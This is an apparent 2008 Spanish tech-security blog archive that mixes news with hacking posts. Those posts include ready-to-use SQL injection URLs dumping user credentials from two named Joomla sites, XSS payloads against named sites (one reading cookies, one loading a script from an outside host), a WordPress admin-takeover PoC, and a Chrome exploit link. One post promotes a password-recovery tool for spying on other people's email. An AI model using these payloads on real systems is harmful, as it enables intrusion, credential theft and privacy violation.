lunes, 29 de septiembre de 2008

Los Retoques Del Yahoo Messenger, Epidermits Y Los Menores

cosa más horrorosa se llama Epidermits, Una aplicación con la que chequear tu username, Los menores y las Nuevas Tecnologías

SQLi en Joomla! y Mambo en componentes

Gran cantidad de sitios aun corren en internet con esta vulnerabilidad, la cual consiste en inyectar una consulta SQL diseñada especialmente para obtener datos de la BD de Joomla!

Veamos dos ejemplos:

URL:

http://www.cleator.co.za/index.php?option=com_rapidrecipe&page=viewrecipe&recipe_id=-1%20UNION%20SELECT%20user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user()%20FROM%20jos_users--






URL:

http://www.zohbetci.com/index.php?option=com_puarcade&Itemid=92&fid=-1%20union%20select%20concat(username,0x3a,password)%20from%20jos_users--

Breve explicación:

Los componentes de Joomla y Mambo 'com_beamospetition',
'com_rapidrecipe', 'com_puarcade', etc... es un objeto de la vulnerabilidad SQLi (SQL inyection) porque falla en las validaciones de las consultas.
Explotando este error puede permitir a un atacante comprometer la aplicacion web, accesar o modificar datos o explotar vulnerabilidades que permanezcan latentes en la base de datos.

Multiples errores en susjed.com


Una vez más, recorriendo la web... me encontré con este sitio, parece ser de origen ruso. Como que no le pagan bien al desarrollador web porque su sitio tiene más agujeros que un queso gruyere.



Muy bien:

El sistema de búsquedas del sitio no valida los campos de entrada y es objeto de ataques XSS.
Dentro del sitio hay instalados foros que pueden ser objeto del ataque. Nos vemos.

Urls:
http://dict.susjed.com/index.php?lang=en_hr&word=%3Cscript%3Ealert(%27alerta:%20%27+%2B+document.cookie)%3B%3C%2Fscript%3E

Sony Ericsson tiene en la mira a Android de Google

La fabricante de teléfonos celulares estudia el sistema operativo para dispositivos móviles de Google, pero aún no es capaz de adoptarlo, anunció el presidente, Dick Komiyama. Recordó igualmente que forman parte de la Fundación Symbian
"Ciertamente estamos estudiando esta oportunidad, aunque no estamos en posición de hacer algo en este momento", dijo Komiyama a periodistas. "Deberíamos mirar a esta aplicación", sostuvo. "Ciertamente estamos interesados", añadió.

Android es una plataforma de fuente abierta diseñada para dispositivos móviles, sobre la cual Google dice que alentará la innovación al permitir a los desarrolladores de software independientes hacerle pequeños ajustes al sistema y crear mejores programas y servicios móviles.

No obstante, Komiyama dijo que Sony Ericsson ya era parte de la Fundación Symbian, un grupo que desde junio ha atraído a cerca de 40 empresas y le da a los desarrolladores acceso libre a su software.

T-Mobile, de Deutsche Telekom AG presentó ayer el primer teléfono celular que usa el software Android. El teléfono está siendo considerado como la respuesta de Google al iPhone.

El teléfono G1, fabricado por HTC Corp., tiene una pantalla sensible al tacto, un teclado parecido al de una computadora y conexión Wi-Fi.

Fuente: Infobae

domingo, 28 de septiembre de 2008

Google Chrome a la baja

A tres semanas de estar en el mercado, descendió la cantidad de usuarios que utilizan Chrome. En contrapartida, Firefox e Internet Explorer recuperaron el espacio perdido. Safari y Opera no sufrieron el desembarco de Google
Las estadísticas dadas a conocer por Net Applications indican que los usuarios que decidieron probar Chrome volvieron a sus antiguas herramientas.

Según Net Applications, el porcentaje de usuarios de Chrome cayó en esta última semana del 0,85% al 0,77%, una cantidad pequeña pero que indica una tendencia a la baja en su uso. La consultora destaca que durante los primeros días Chrome alcanzó un 1% del mercado, cayendo al 0,85% en su segunda.

"La tendencia de utilización de Chrome empieza a ser descendente algo que ya reflejan los números de esta semana”, afirmó Vince Vizzaccaro, vicepresidente de Márketing de Net Applications.

En contrapartida, Internet Explorer y Firefox recuperaron el terreno perdido frente a Chrome (0,6% y 0,24%, respectivamente). La llegada de Chrome no supuso, según la consultora, una disminución en el uso de Safari ni Opera, que mantuvieron sus posiciones.

La inmunidad de Safari, según Vizzacaro, puede ser debido a la falta de competencia de Chrome ya que no está disponible de manera oficial para Mac.

Uno de los puntos interesantes del trabajo de la consultora es que los números de Chrome, al igual que los de Firefox y Safari, crecen rápidamente después de la jornada laboral y su utilización cae a la mañana siguiente. Esto puede ser debido a que muchas empresas tienen como navegador a IE y no permiten a sus empleados utilizar navegadores alternativos.

Net Applications basa sus estadísticas en el análisis constante de 40 mil sitios de internet.

Fuente: Infobae.com

Los portátiles más ligeros del 2008

A mediados del 2005, Nicholas Negroponte anunciaba su decisión de desarrollar un portátil de bajo coste dirigido a los niños de los países en desarrollo.

Han pasado ya tres años de esa fecha y hoy los ultraportátiles son una realidad en el mercado, no así el famoso OLPC de Negroponte. El precio está por encima de los 100 dólares prometidos pero los usuarios de todo el mundo se muestran satisfechos con estos dispositivos ligeros, cómodos de usar y que apenas cuestas 300 euros.

El primero en dar el campanazo fue el fabricante taiwanés de placas base Asus. El EeePC se convirtió en uno de los objetos de deseo más codiciados por los geeks de todo el mundo. A las pocas semanas Everex saco un dispositivo de características similares aunque no tuvo el mismo éxito que el fabricado por Asus.

Poco a poco otros fabricantes fueron sumándose al carro y hoy no existe apenas ninguno que no tenga en su catalogo “Navidad 2008″ un ultraportátil (bautizado por los estadounidenses como Netbook).

Y es que las primeras cifras de ventas son realmente asombrosas y en países como Francia han conseguido ya copar un 10% de las ventas de portátiles a pocas semanas de ser lanzados.

En este especial de Noticiasdot.com tenéis una guía completa de todos (perdón, casi todos) los ultraportátiles del mercado.

A destacar:

Los “pioneros” lanzaron sus dispositivos con chips de Via mientras que los gigantes de la industria han preferido esperar y dotarlos de un procesador de Intel, el Atom.

Los primeros ultraportátiles operaban bajo distintas distribuciones de Linux, los grandes han preferido (salvo Acer) sacar al mercado dispositivos únicamente con Windows Vista.

También los primeros ultraportátiles ofrecían una pantalla de 8 pulgadas mientras que aquellos que han apostado por Intel han aumentado el tamaño a 10 pulgadas.

Finalmente y como elementos comunes tenemos webcams integradas, dispositivos con HD flash de hasta 80 GB (aunque las versiones más económicas este apenas es de 2 GB), puertos USB y conectividad LAN.

Aconsejable, a la hora de elegir un ultraportátil recomendamos buscar aquellos que ofrezcan mayores prestaciones, como por ejemplo conexión Wifi y Bluetooth, pantalla de 10 pulgadas y HD de una capacidad suficiente para almacenar el sistema operativo y ficheros multimedia.

En cuanto al sistema operativo, al poder elegir Windows Vista o Linux es el comprador el que deberá optar por aquel con el que este más habituado a trabajar o familiarizado en su uso.



acer-aspire-one-1
Aspire One: El netbook de Acer Airis Kira: El netbook con acento español
eee901 eee1000
Asus EEE PC 901: La estrella se renueva Asus EEE PC 1000H: El hermano grande
emtec gdium ep-pc Everex_Cloudbook
Emtec Gdium: Una apuesta por lo diferente Nuevo Cloudbook de Everex
Imagen HP 2133-Mini-Note-PC-portada
Fujitsu Siemens Amilo Mini Ui 3520, el ultra portátil con sabor alemán HP Mini Note 2133: La pequeña maravilla de HP
Intel_Classmate-20 inves-junior
Intel Classmate PC, 2.0 Inves junior, el Portátil para los peques
IdeaPad S10 medion Akoya-Mini-portada
Lenovo IdeaPad S10 con pantalla de 10 pulgadas Medion Akoya Mini E1210: Tras los pasos de Airis y Sourcouf
msi-wind-1 Imagen
MSI Wind U100: Ninguna versión está disponible en Linux S1 imini Series, un nuevo ultraportátil de 10,2? para el mercado chino
Samsung NC 10
Netbook X110 el utraportátil de 399 euros de LG Samsung NC10, el ultraportátil del gigante coreano
surcoaf-ordenador-ultraportatil Imagen
Surcouf Mobile PC: El mini portátil francófono Toshiba se apunta al carro de los “ultras” con un dispositivo con pantalla de alta resolución
VIA OpenBook 1 M







OpenBook, el miniportátil de Via



Fuente: Noticiasdot.com

Las solicitudes y cuestiones más tontas dirigidas al departamento de soporte


Los expertos de los departamentos técnicos de las oficinas están acostumbrados a recibir peticiones excéntricas, pero a veces las preguntas son tan absurdas que los dejan atónitos, según una lista de preguntas inauditas recopilada por una empresa tecnológica estadounidense.

Un ejemplo es ‘¿Por qué este ‘mouse’ inalámbrico no está conectado al ordenador?’, o bien ‘¿Podrías reiniciarme internet?’.

Incluso hubo alguien que preguntó dónde podría conseguir una aplicación que le permitiera rastrear a los extraterrestres.

Robert Half Technology, una empresa proveedora de profesionales en informática en Menlo Park, California, preguntó a 1.400 directivos de departamentos técnicos de diversas compañías en Estados Unidos que les enviaran las preguntas más desconcertantes que hubieran recibido de parte de compañeros de trabajo que pedían auxilio técnico.

Entre las más extrañas figuran:

- ‘Mi ordenador me dice que presione ‘cualquier tecla’ para continuar. ¿Dónde está ‘cualquier’ tecla?’.

- ‘¿Podrías reordenarme el teclado para que esté en orden alfabético?’.

- ‘¿Cuáles son las previsiones meteorológicas para el año que viene?’.

- ‘¿Me puedes instalar la televisión por cable en mi ordenador?’.

Y también está registrada la historia de un usuario que confundió la bandeja para insertar el CD-ROM con un apoya-vasos cómodamente incorporado a su ordenador. ‘¿Cómo hago para que salga de nuevo el apoya-vasos que estaba en mi ordenador?’, preguntó.

Katherine Spencer Lee, directora ejecutiva de Robert Half Technology, dijo que tales preguntas ponían a prueba las habilidades de los departamentos de apoyo técnico. ‘Estas preguntas inusuales subrayan la necesidad de que el personal de apoyo técnico también demuestre más paciencia, empatía y sentido del humor’, dijo.

Fuente: Noticiasdot.com

Evite el robo de información de su correo electrónico

En un mundo virtual conectado con transacciones comerciales en-línea, medios de comunicación digitales, sitios web y de información que surge diariamente y que circula por Internet, termina todo eso siendo indexado por buscadores como Google, Yahoo o MSN Live Search.

Muchas vidas terminan siendo libros abiertos para aquellas personas que las consultan por curiosidad, o para informarse o para hacer daño. Por eso, en el manejo de la información confidencial se deben tomar precauciones para que los datos personales que se pueden encontrar en los buscadores no les permitan a los hackers abrir las puertas a espacios virtuales más íntimos.

Eso fue lo que le pasó a Sarah Palin, candidata a la vicepresidencia de los Estados Unidos en llave con McCain. Un hacker, supuestamente identificado como un estudiante en Tennessee, le usurpó el correo a la gobernadora de Alaska y tuvo acceso a sus fotos familiares y a toda la información de esos archivos. ¿Cómo lo hizo? En los correos electrónicos gratis de Internet, conocidos como web mails, cuando se abre una cuenta, primero se pide el nombre del usuario -user name-, el pasaporte o clave -password- y luego se deben responder algunas preguntas con información 'privada' de la persona dueña de la cuenta para que, en caso de olvido de su clave o nombre de usuario, pueda restaurarlos -reset- y poder seguir teniendo acceso a su correo.

Pues bien, en el caso de la cuenta de correo de Yahoo utilizada por Palin, el hacker simuló haber olvidado el pasaporte y su nombre de usuario. El correo le exigió contestar entonces las preguntas establecidas para poder restaurar estos datos. Estas eran la fecha de nacimiento, el país de residencia y el código postal. Una vez restaurada la clave, le pidió contestar la pregunta de dónde había conocido a su esposo. No es muy difícil imaginarse que esa información puede ser revelada por cualquiera de los buscadores existentes, una vez hecha la consulta apropiada. Eso fue exactamente lo que el hacker: hizo y pudo apropiarse de la cuenta de correo de Sarah Palin de una forma muy fácil.

Lo que se debe hacer en estos casos es responder las preguntas exigidas por el correo de Internet para restaurar los datos, el mismo de una clave o pasaporte. Si la pregunta es: "¿Cuál es su equipo de fútbol preferido?", no se debe responder Millonarios, sino algo como M1ll&n@rios. Con esto se logra un grado importante de seguridad y se evita que otros puedan entrar a su correo. ¡Claro que si se le olvidan la clave, el nombre de usuario y las respuestas, nadie, inclusive usted, tendrá acceso a su correo! ¡Tocará sacar otra cuenta de web mail!

Fuente: Eltiempo.com de Guillermo Calderón

La técnica anteriormente mencionada no debe ser relacionada con actividades de hacking, debido a que se roba información.

Para evitar ser objeto del robo de una cuenta de correo electrónico, considere a la respuesta secreta como una segunda contraseña que para mayor seguridad deberá ser una cadena aleatoria de números y letras, así como caracteres especiales.

jueves, 25 de septiembre de 2008

Varias bugs en aplicaciones como Firefox, Thunderbird, SeaMonkey

La Fundación Mozilla ha informado sobre múltiples vulnerabilidades en varios de sus productos que podrían ser aprovechadas por un atacante remoto para revelar información sensible, perpetrar ataques de cross-site scripting, provocar una denegación de servicio, saltarse restricciones de seguridad o ejecutar código arbitrario en un sistema vulnerable.

A continuación se detallan las vulnerabilidades publicadas:

1- Desbordamiento de búfer causado por URLs codificadas con UTF-8 especialmente manipuladas. Esto podría ser aprovechado por un atacante remoto para ejecutar código arbitrario. Afecta a Firefox 2.x y SeaMonkey.

2- Salto de restricciones de seguridad al no comprobar de forma adecuada la política de mismo origen en nsXMLDocument::OnChannelRedirect(), lo que podría ser aprovechado para ejecutar código JavaScript en el contexto de un sitio web diferente al original. Afecta a Firefox 2.x, Thunderbird y SeaMonkey.

3- Escalada de privilegios y cross-site scripting causado por múltiples errores de validación de entrada en feedWriter. Esto podría permitir que un atacante ejecutase código script arbitrario con los privilegios de chrome (componente principal de Firefox, no confundir con el navegador de Google). Afecta sólo a Firefox 2.x.

4- Un error durante el manejo de las pulsaciones del ratón podría permitir que un atacante moviera el contenido de la ventana mientras el ratón está siendo pulsado, pudiendo causar que un item fuera arrastrado en vez de "clickeado". Esto podría ser aprovechado para forzar el arrastre de ciertos componentes, lo que permitiría, entre otros efectos, realizar una descarga no solicitada. Afecta a Firefox 2.x, 3.x y SeaMonkey.

5- Múltiples fallos relacionados con XPCnativeWrapper podrían permitir a un atacante remoto ejecutar código script arbitrario con los privilegios de chrome. Afecta a Firefox 2.x, 3.x y SeaMonkey. Podría afectar a Thunderbird si se habilita la ejecución de JavaScript.

6- Múltiples problemas de estabilidad en los motores de diseño, gráficos y JavaScript de los productos Mozilla, que podrían ser explotados para causar una denegación de servicio o incluso ejecutar código arbitrario aprovechando una posible corrupción de memoria. Afecta a Firefox 2.x, 3.x, SeaMonkey y Thunderbird.

7- Cross-site scripting provocado por la interpretación de forma errónea de caracteres BOM (Byte-Order Mark, tres caracteres que se encuentran al principio de un archivo para indicar que está codificado como UTF-8, UTF-16 o UTF-32. Ejemplo:  ). Afecta a Firefox 2.x, 3.x, SeaMonkey y Thunderbird.

8- Errores en el protocolo "resource:" que podrían ser aprovechados para conducir ataques de directorio trasversal y revelar información sensible. Afecta a Firefox 2.x, 3.x, SeaMonkey y Thunderbird.

9- Un error en el decodificador XBM podría permitir la lectura de pequeñas porciones aleatorias de memoria, lo que daría lugar a la revelación de información sensible. Afecta a Firefox 2.x y SeaMonkey.

Se recomienda la actualización de los productos Mozilla a las siguientes versiones no vulnerables: Firefox 2.0.0.17 ó 3.0.2, Thunderbird 2.0.0.17 y SeaMonkey 1.1.12 tan pronto como estén disponibles desde:
http://www.mozilla.com/

Recordamos que también se pueden descargar de forma automática una vez que el propio programa nos avise de que hay una actualización pendiente. Notificación que normalmente llegará entre 24 y 48 horas después de que la nueva versión esté disponible.

Fuente: hispasec.com 

miércoles, 24 de septiembre de 2008

Recuperar la contraseña olvidada de Windows Live Messenger - Desencriptar password Hotmail - (Lammer topic)

Muy bien, debido a la popularidad de este tema en la red... decidí crear esta entrada, así que a continuación les muestro este sencillo y útil programa el cual permite recuperar una contraseña de msn messenger(hotmail) guardada en el registro de windows.
Cuando olvidaste tu contraseña, no te acuerdas de la pregunta secreta y de pura casualidad dejaste activada la opcion de recordar contraseña... Ó simplemente eres un curioso que quiere espiar los correos de alguien más en el trabajo o el hogar... Este programa te sirve.
"El que busca, encuentra".
Es muy sencillo de utilizar, basta con ejecutarlo y tendremos el listado de cuentas de usuario y contraseñas.

Veamos la imagen:

Así que nunca guarden contraseñas por defecto... Este programa no ocupa instalar.


MessenPass es una herramienta de recuperación de contraseña que revela las contraseñas de las siguientes aplicaciones de mensajería instantánea:
MSN Messenger
Windows Messenger (en Windows XP)
Windows Live Messenger (en Windows XP y Vista)
Yahoo Messenger (versiones 5.xy 6.x)
Google Talk
ICQ Lite 4.x/5.x/2003
AOL Instant Messenger v4.6 o inferior, AIM 6.x, y AIM Pro.
Trillian
Miranda
GAIM / Pidgin
MySpace IM
PaltalkScene
MessenPass sólo se puede utilizar para recuperar las contraseñas para identificar la actual-en usuario en el equipo local, y sólo funciona si usted eligió el recordar su contraseña en uno de los programas anteriores. Usted no puede utilizar esta utilidad para el acaparamiento de las contraseñas de otros usuarios.

Haga clic
aqui para descargar desde la web del autor.

Haga clic
aqui para descargar desde el mirror en mediafire.

Haga clic
aqui para descargar el idioma en español.

martes, 23 de septiembre de 2008

Wireshark (Ethereal) - Sniffer

Wireshark, antes conocido como Ethereal, es un analizador de protocolos utilizado para realizar análisis y solucionar problemas en redes de comunicaciones para desarrollo de software y protocolos, y como una herramienta didáctica para educación. Cuenta con todas las características estándar de un analizador de protocolos.

La funcionalidad que provee es similar a la de tcpdump, pero añade una interfaz gráfica y muchas opciones de organización y filtrado de información. Así, permite ver todo el tráfico que pasa a través de una red (usualmente una red Ethernet, aunque es compatible con algunas otras) estableciendo la configuración en modo promiscuo. También incluye una versión basada en texto llamada tshark.
Permite examinar datos de una red viva o de un archivo de captura salvado en disco. Se puede analizar la información capturada, a través de los detalles y sumarios por cada paquete. Wireshark incluye un completo lenguaje para filtrar lo que queremos ver y la habilidad de mostrar el flujo reconstruido de una sesión de TCP.

Wireshark es software libre, y se ejecuta sobre la mayoría de sistemas operativos Unix y compatibles, incluyendo Linux, Solaris, FreeBSD, NetBSD, OpenBSD, y Mac OS X, así como en Microsoft Windows.

Aspectos importantes de Wireshark

Mantenido bajo la licencia GPL
Trabaja tanto en modo promiscuo como en modo no promiscuo
Puede capturar datos de la red o leer datos almacenados en un archivo (de una captura previa)
Basado en la librería pcap
Tiene una interfaz muy flexible
Capacidades de filtrado muy ricas y frescas
Admite el formato estándar de archivos tcpdump
Reconstrucción de sesiones TCP
Se ejecuta en más de 20 plataformas
Es compatible con más de 480 protocolos
Puede leer archivos de captura de más de 20 productos


Seguridad

Para capturar paquetes directamente de la interfaz de red, generalmente se necesitan permisos de ejecución especiales. Es por esta razón que Wireshark es ejecutado con permisos de
Superusuario. Tomando en cuenta la gran cantidad de analizadores de protocolo que posee, los cuales son ejecutados cuando un paquete llega a la interfaz, el riesgo de un error en el código del analizador podría poner en riesgo la seguridad del sistema (como por ejemplo permitir la ejecución de código externo). Por ésta razón el equipo de desarrolladores de OpenBSD decidió remover Ethereal antes del lanzamiento de la versión 3.6.[1]
Una alternativa es ejecutar
tcpdump o dumpcap que viene en la distribución de Wireshark en modo Superusuario, para capturar los paquetes desde la interfaz de red y almacenarlos en el disco, para después analizarlos ejecutando Wireshark con menores privilegios y leyendo el archivo con los paquetes para su posterior análisis.

Portabilidad


Wireshark corre en sistemas operativos tipo
Unix, incluyendo Linux, Solaris, FreeBSD, NetBSD, OpenBSD, Mac OS X, Microsoft Windows, U3 y en Portable Apps

Fuente:
wikipedia

Haga clic
aqui para descargar wireshark.

lunes, 22 de septiembre de 2008

Apoyanos para seguir mejorando

Hola a todos, les agradezco su preferencia. Y para seguir llevando a ustedes la mejor información de Tecnología, seguridad y aspectos de informática o sistemas. Les solicito su apoyo, para que se inscriban en Mercado Libre, el proceso llevará unos pocos segundos, validan su mail y listo!

Mercado Libre es un portal donde puedes comprar y vender de todo: desde un llavero hasta una casa. Te invito a conocer
este portal.

En lo personal, he adquirido varios artículos y me han sido enviados con toda seguridad.

Recomiendo que antes de realizar alguna compra o venta, lean estos artículos:
*
Como comprar
*
Como vender
*
Por que es seguro
Haga clic aqui para apoyarnos registrándote en Mercado Libre.

domingo, 21 de septiembre de 2008

Alerta Grave de XSS en guflox.info


Solo vean la imagen, no se valida correctamente la variable la búsqueda de datos. :

Variable afectada:
http://guflox.info/buscar.php?q=

Ejemplo:
http://guflox.info/buscar.php?q=%3CSCRIPT%20SRC=//ha.ckers.org/.j%3E

Los administradores ya se dieron cuenta del error.

jueves, 18 de septiembre de 2008

Nokia Patentando, Un Tio Robando Y Un Nuevo Y Práctico T




Una web de videojuegos para los que quieren dejar de fumar, Nokia patentará un sistema para escribir en el dorso de las fotos digitales, Un tio antisistema que se lleva la past...

martes, 16 de septiembre de 2008

Los Del CERN Están Acojonados, Atmosphir, DropBox Y Nava



Los hackers acojonana a los del CERN,Una web donde construir videojuegos, ya puedes tener una t-shirt con tus tweets favoritos, la recomendación de edeleon se llama DropBox, Empieza Navarparty. Para terminar reflexionamos sobre los efectos del temible Cambio Climático

lunes, 15 de septiembre de 2008

Qué es el Phishing y un ejemplo práctico de cómo detectarlo

Muy bien, debido a la propagación de técnicas de fraude he decidido realizar este artículo donde conoceremos ¿qué es el phishing?, ¿Cómo detectar un sitio fraudulento?, con el motivo de evitar ser engañados y tener cuidado al momento de proporcionar datos importantes en internet.

Antes de continuar, es necesario dejar claro el significado de Phishing; para esto vamos a recurrir a wikipedia:

Anzuelo o Estafa electrónica (inglés phishing. Ver Origen de la palabra) es un término informático que denomina un tipo de delito encuadrado dentro del ámbito de las estafas, y que se comete mediante el uso de un tipo de ingeniería socialcontraseña o información detallada sobre tarjetas de créditoestafador, conocido como phisher, se hace pasar por una persona o empresa de confianza en una aparente comunicación oficial electrónica, por lo común un correo electrónico, o algún sistema de mensajería instantáneao incluso utilizando también llamadas telefónicas. caracterizado por intentar adquirir información confidencial de forma fraudulenta (como puede ser una u otra información bancaria).

Dado el creciente número de denuncias de incidentes relacionados con el phishingealizado intentos con leyes que castigan la práctica, campañas para prevenir a los usuarios y con la aplicación de medidas técnicas a los programas. se requieren métodos adicionales de protección.

Según Wikipedia es phishing es un delito informático, una estafa a base de mentiras (ingeniería social). En muchos países este delito está regulado, sin embargo, en muchos otros aún no hay leyes que protejan a los usuarios de este tipo de actividades.

Vamos a ver un ejemplo prático de cómo se realiza el phishing:

1. Se envía un mensaje al usuario, en el cual se le informa que realice una actualización en sus datos de cuenta debido a cuestiones de seguridad ó simplemente se le anuncia algún tipo de oferta o engaño al respecto, aquí es donde se aplica la ingeniería social por parter del phisher o estafador. Si el mensaje es recibido vía correo electrónico, lo más común es que parezca proceder de una e-mail de confianza, sin embargo, esto es muy fácil de conseguir. Así que no debemos confiarnos.

Veamos la imagen de la trampa:























2. Acto seguido, el usuario da clic en el enlace proporcionado por el estafador. Una parte muy importante de la prevención del phishing es el ver las urls de los enlaces, observe que en la barra de estado aparece un vínculo a:
http://www.itelcel.mx.kz (sitio copia falsa)
el enlace debería ser:
http://www.ideastelcel.com
Veamos la imagen del vínculo:












3. El tercer paso consiste en que el usuario visite el sitio estafa e ingrese sus datos de cuenta o bancarios.
Para evitar ser defraudados por un phiser, debemos de tener en cuenta lo siguiente:
Una vez estando en la web donde queremos proporcionar los datos, debemos volver a validar la url de la barra de direcciones, que corresponda al dominio original.
Además debemos observar que la página se encuentre bajo el protocolo seguro, la url debe de empezar: https://www.dominio.dom y además incluir el típico candado de seguridad. En este Ejemplo la url es: http://www.itelcel.mx.kz/ y debería ser: http://www.ideastelcel.com




















4. El cuarto y último paso consiste en que el usuario complete los datos del formulario falso y los envíe.


Mucho cuidado con el phishing, observen las direcciones y sean precavidos.
Además actualicen su navegador web, ya que Mozilla Firefox e Internet Explorer 7 cuentan con sistema de anti-phishing.

Vulnerabilidad XSS en www.puebla.gob.mx



Navegando en Internet y probando vulnerabilidades, me encontré el sitio:
http://www.puebla.gob.mx

Muy bonito y funcional. Pero cuenta con graves problemas de seguridad XSS (Cross Site Scripting).

URL's Vulnerables encontradas:

https://portalsfa.sfapuebla.gob.mx/srl/Impuestos/Derechos/Lugares.jsp?desc_servicio=%3Cscript%3Ealert(%27alerta%20de%20seguridad%27);%3C/script%3E%3Cplaintext%3E

http://www.puebla.gob.mx/puebla/complementos/contenido/plantilla.jsp?idmenu=17&pagina=contenido.jsp&id=%3Cscript%3Ealert(%27alerta%27);%3C/script%3E%3Cscript%3Ealert(%27alerta%20de%20seguridad%27);%3C/script%3E

El problema es grave debido a que no se validan las urls de navegación.
Veamos el ejemplo:


Observen que la página muestra el candado de seguridad. Sin embargo hay una grave vulnerabilidad de XSS presente.
Esto se corrije filtrando los datos de la variable Lugares.jsp?desc_servicio=.














Veamos otro ejemplo del XSS en este sitio:

En esta imagen podemos ver que se puede ingresar una cadena específica para afectar al sitio.

sábado, 13 de septiembre de 2008

jDownloader 0.2.857

Descarga software automáticamente desde Rapidshare o megaupload.

jDownloader es un gestor de descargas especialmente diseñado para automatizar el proceso de descarga de archivos de portales que ofrecen servicio de almacenamiento como, por ejemplo, RapidShare o Megaupload.

Con jDownloader el proceso de descarga es mucho más sencillo. Sólo tienes que añadir todos los enlaces del contenido que quieres descargar e iniciar la descarga para que el programa se encargue de todo: accede al enlace, espera el tiempo necesario, valida los mensajes e inicia la descarga. Así con todos los enlaces incluidos en la cola.

Desde sus opciones puedes añadir o borrar enlaces, guardarlos para recuperarlos en cualquier momento, configurar un usuario Premium para acelerar la descarga, limitar el ancho de banda, entre otras posibilidades.

Funciona con depositfiles.com, Filefactory.com, Filer.net, Freakshare.net, Meinupload.com, Megaupload.com, Netload.com, RapidShare.com, RapidShare.de, Uploaded.to y YouTube.com.

Haga clic aqui para descargar.

viernes, 12 de septiembre de 2008

Flickr Se Renueva, UniqueSkins, Bert Simons, Hitch y Gravit

Flickr se lava la cara para presentarse en sociedad, pegatinas personalizadas, Bert Simons hace caras de papel, La tienda online presenta: Lo mejor para hacer autoestop, Un coche que se sube por las paredes. Para terminar nos permitimos reflexionar sobre una noticia que nos ha impactado.



Administrador Web a la cárcel por subir contenido ilegar - Elite Torrents


Daniel Dove, de 26 años, deberá pagar, además, 20.000 dólares de indemnización.

El proceso contra “Elitetorrents.org” finalizó ayer con una dura sentencia para Daniel Dove de 26 años, el último de los tres administradores del sitio que aún no había sido condenado.

De los tres administradores, Dove es el que se ha llevado la peor parte ya que Grant Stanley y Scott McCausland fueron condenados a cinco meses de prisión.

Según el tribunal, las pruebas recogidas por la policía demostraron que Dove era un “uploader”, es decir un usuario que subía contenidos para compartir, así como el responsable de contactar con otros miembros para aumentar la oferta de “contenidos piratas” que podían descargarse de la red.

La justicia ratificó que EliteTorrents.org” fue una de las mayores redes de enlaces P2P con 125.000 miembros activos y ofreciendo la descarga de 700 películas, algunas de ellas antes de su salida al circuito comercial. El portal fue intervenido por la policía estadounidense a mediados del 2005 cuando Dove contaba con 26 años.

Fuente: noticiasdot.com

Deface al portal sinaloa.gob.mx del gobierno del estado

Siendo las 12:10 am del día viernes 12 de Septiembre de 2008, el sitio del gobierno del estado de sinaloa fué revisada y se encontraron vulnerabilidades que fueron atacadas por expertos en el tema.

Al momento no se tienen detalles del deface al sitio, pero al parecer hubo una elevación de privilegios que permitieron modificar archivos en el servidor. Esperemos más información al respecto.

URLS afectadas:
http://laip.sinaloa.gob.mx/
http://www.sinaloa.gob.mx/
http://laip.sinaloa.gob.mx/ws/index2.asp
http://laip.sinaloa.gob.mx/index.asp


Aquí tienen la vista del sitio una vez defaceada:




En este blog se informa sobre seguridad, se alertan errores informáticos y se reconocen los descubrimientos de fallos en sistemas.

lunes, 8 de septiembre de 2008

Hosting gratuito y sin banners

Hola a todos,

Creo que esta información puede ser útil para usted. Si usted planea llegar a su sitio web, aquí es una buena libre proveedor de alojamiento web para elegir - 000webhost.com

Ofrecen alojamiento totalmente gratuito, no se realizan capturas. Usted recibe 350 MB de espacio en disco y 100 GB de ancho de banda. También tienen cPanel panel de control que es sorprendente y fácil de usar creación del sitio web. Por otra parte, no hay ningún tipo de publicidad en sus páginas.

Tú te puedes registrar aquí: http://www.000webhost.com/51339.html



Free Web Hosting with Website Builder

WordPress 2.6.1 SQL Column Truncation Vulnerability

# WordPress 2.6.1 SQL Column Truncation Vulnerability (PoC)
#
# found by irk4z[at]yahoo.pl
# homepage: http://irk4z.wordpress.com/
#
# this is not critical vuln [;
#
# first, read this discovery:
# http://www.suspekt.org/2008/08/18/mysql-and-sql-column-truncation-vulnerabilities/
#
# in this hack we can remote change admin password, if registration enabled
#
# greets: Stefan Esser, Lukasz Pilorz, cOndemned, tbh, sid.psycho, str0ke and all fiends

1. go to url: server.com/wp-login.php?action=register

2. register as:

login: admin x
email: your email

^ admin[55 space chars]x

now, we have duplicated 'admin' account in database

3. go to url: server.com/wp-login.php?action=lostpassword

4. write your email into field and submit this form

5. check your email and go to reset confirmation link

6. admin's password changed, but new password will be send to correct admin email ;/

# milw0rm.com [2008-09-07]

Google Chrome Browser 0.2.149.27 (SaveAs) Remote BOF Exploit

PoC Code is in Attach file because this file is saved in 'Unicode' type for exploit.

Here is Description for this Vuln :
· Type of Issue : Buffer Overflow.
· Affected Software : Google Chrome 0.2.149.27.
· Exploitation Environment : Google Chrome (Language: Vietnamese) on Windows XP SP2.
· Impact: Remote code execution.
· Rating : Critical .
· Description :
The vulnerability is caused due to a boundary error when handling the “SaveAs” function. On saving
a malicious page with an overly long title (<title> tag in HTML), the program causes a stack-based overflow and makes
it possible for attackers to execute arbitrary code on users’ systems.
· How an attacker could exploit the issue :
To exploit the Vulnerability, a hacker might construct a specially crafted Web page, which contains malicious code.
He then tricks users into visiting his Website and convinces them to save this Page. Right after that, the code would
be executed, giving him the privilege to make use of the affected system.
· Discoverer : Le Duc Anh - SVRT - Bkis
· About SVRT :
SVRT, which is short for Security Vulnerability Research Team, is one of Bkis researching groups. SVRT specializes
in the detection, alert and announcement of security vulnerabilities in software, operating systems, network protocols
and embedded systems…
· Website : security.bkis.vn
· Mail : svrt[at]bkav.com.vn

http://milw0rm.com/sploits/2008-chrome.tgz

# milw0rm.com [2008-09-05]

Fundador de MySpace ligado al Hacking



Tom Anderson hoy es mundialmente conocido por ser el fundador de MySpace, una de las principales redes sociales a nivel mundial.

Claro que su fama actual no tiene nada que ver con la que tenía en la década de los 80’s, donde era un personaje que se encontraba en la mira del FBI por sus actividades extraprogramáticas.

Por allá por el año 1985 Anderson tenía sólo 14 años, pero igual se las ingenió para intervenir los sistemas informáticos del Chase Manhattan Bank. Como fue descubierto y ante la imposibilidad de ser detenido por su corta edad, el FBI le confiscó todos sus equipos, le amarró las manos y le dijo a su mamá: “Este niñito requiere un sicólogo” (en verdad lo último lo inventé).

El método utilizado por “Mr. Anderson” consistía en utilizar números telefónicos legítimos para realizar las intervenciones a los sistemas, un método que se conoce como “war-dialing”.

